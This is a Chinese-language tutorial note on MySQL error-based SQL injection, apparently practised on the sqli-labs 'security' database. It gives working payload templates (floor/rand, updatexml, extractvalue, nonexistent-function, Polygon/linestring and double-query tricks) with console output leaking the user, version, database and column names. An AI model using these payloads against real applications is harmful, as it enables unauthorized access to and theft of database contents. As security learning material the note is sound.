MySQL_报错注入

MySQL_报错注入

1.通过floor报错

  • Payload框架

and (select 1 from (select count(*),concat((payload),floor (rand(0)*2))x from information_schema.tables group by x)a)
替换payload即可

注:输出字符长度限制为64个字符

eg:

1
2
3
MariaDB [security]> select * from users where id =1 and (select 1 from (select count(*),concat((select user()),floor (rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'root@localhost1' for key 'group_key'
MariaDB [security]>

2.通过updatexml报错

  • Payload框架

and updatexml(1,payload,1)
替换payload即可

注:输出字符有长度限制,最长32位

eg:

1
2
3
MariaDB [security]> select * from users where id =1 and updatexml(1, concat(0x7e,(select version()),0x7e),1);
ERROR 1105 (HY000): XPATH syntax error: '~5.5.65-MariaDB~'
MariaDB [security]>

3.通过extractvalue报错

and extractvalue(1, payload)
替换payload即可

注:输出字符有长度限制,最长32位

eg:

1
2
3
MariaDB [security]> select * from users where id =1 and extractvalue(1, concat(0x7e,(select @@version),0x7e)); 
ERROR 1105 (HY000): XPATH syntax error: '~5.5.65-MariaDB~'
MariaDB [security]>

其他报错法

  • 1.利用不存在函数法爆库名

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    当一个库中不存在的自定义函数他就会爆出当前库中没有此函数,从而爆出数据库名。
    MariaDB [security]> select * from users where id =f();
    ERROR 1305 (42000): FUNCTION security.f does not exist
    MariaDB [security]>

    爆出数据库名security

    MariaDB [security]> select * from users where id = 1 and id = f();
    ERROR 1305 (42000): FUNCTION security.f does not exist
    MariaDB [security]> select * from users where id = 1 or id = f();
    ERROR 1305 (42000): FUNCTION security.f does not exist
    MariaDB [security]>

    paylaod:
    ---
    数字型注入: id=f() --+
    字符型(先闭合): id=1' or id=f()--+
    id=1' and id=f()--+
    ---

  • 2.Polygon,linestring爆表名,库名

1
2
3
4
5
6
7
8
MariaDB [security]> select * from users where id = 1 and Polygon(id);
ERROR 1367 (22007): Illegal non geometric '`security`.`users`.`id`' value found during parsing
MariaDB [security]> select * from users where id = 1 and linestring(id);
ERROR 1367 (22007): Illegal non geometric '`security`.`users`.`id`' value found during parsing
MariaDB [security]>

Polygon,linestring爆表名,库名 id是表里一个存在的字段名,否则不会爆出来

  • 3.Error based Double Query Injection
1
2
3
4
MariaDB [security]> select * from users where id = 1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1;
ERROR 1062 (23000): Duplicate entry '5.5.65-MariaDB~1' for key 'group_key'
MariaDB [security]>